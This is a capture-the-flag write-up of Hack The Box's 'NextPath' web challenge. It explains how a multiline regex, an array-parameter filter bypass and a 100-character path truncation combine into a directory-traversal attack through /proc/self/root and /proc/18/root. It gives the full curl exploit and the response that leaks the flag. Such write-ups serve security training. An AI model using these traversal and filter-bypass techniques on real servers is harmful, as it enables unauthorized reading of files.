NextPath

Posted on Sat 28 December 2024 in HTB challenge

This is a writeup of the NextPath challenge which is a web challenge from Hack The Box.

Dockerfile shows that flag in root

COPY flag.txt /flag.txt

Goal: read flag in root

team.js

Script is vulnerable due to multiline regex:

const ID_REGEX = /^[0-9]+$/m;

Only first line must contain numbers then can user any other character.

Directory traversal filter bypass

  if (query.id.includes("/") || query.id.includes("..")) {
    console.error("DIRECTORY TRAVERSAL DETECTED:", query.id);
    res.status(400).end("DIRECTORY TRAVERSAL DETECTED?!? This incident will be reported.");
    return;
  }

If id is an array only first element will be checked so use multiple id parameters in url.

Read flag

const filepath = path.join("team", query.id + ".png");
const content = fs.readFileSync(filepath.slice(0, 100));

Input is prepended with team and then .png is appended then this is cut off at 100 characters

If query.id is long enough we can get rid of .png

flag.txt is 8 characters long

So 100 - 8 = 92 characters to get to root directory

In docker container see that process id 18 is often used so following characters used:

flag.txt    8 characters
../     3 characters
/proc/1/root    12 characters
/proc/18/root   13
/proc/self/root 15 characters

solving equation:

4x ../
1x /proc/self/root
5x /proc/18/root
+ flag.txt

Exploit

curl -v 'http://83.136.255.126:51879/api/team?id=1%0Aa&id=../../../../../../../proc/self/root/proc/18/root/proc/18/root/proc/18/root/proc/18/root/proc/18/root/flag.txt'

*   Trying 83.136.255.126:51879...
* Connected to 83.136.255.126 (83.136.255.126) port 51879
> GET /api/team?id=1%0Aa&id=../../../../../../../proc/self/root/proc/18/root/proc/18/root/proc/18/root/proc/18/root/proc/18/root/flag.txt HTTP/1.1
> Host: 83.136.255.126:51879
> User-Agent: curl/8.7.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< content-type: image/png
< date: Mon, 25 Nov 2024 13:38:48 GMT
< connection: close
< transfer-encoding: chunked
<
HTB{tr4v3r51ng_p45t_411_th3_ch3ck5...t4sk_w3ll_d0ne!}
* Closing connection

web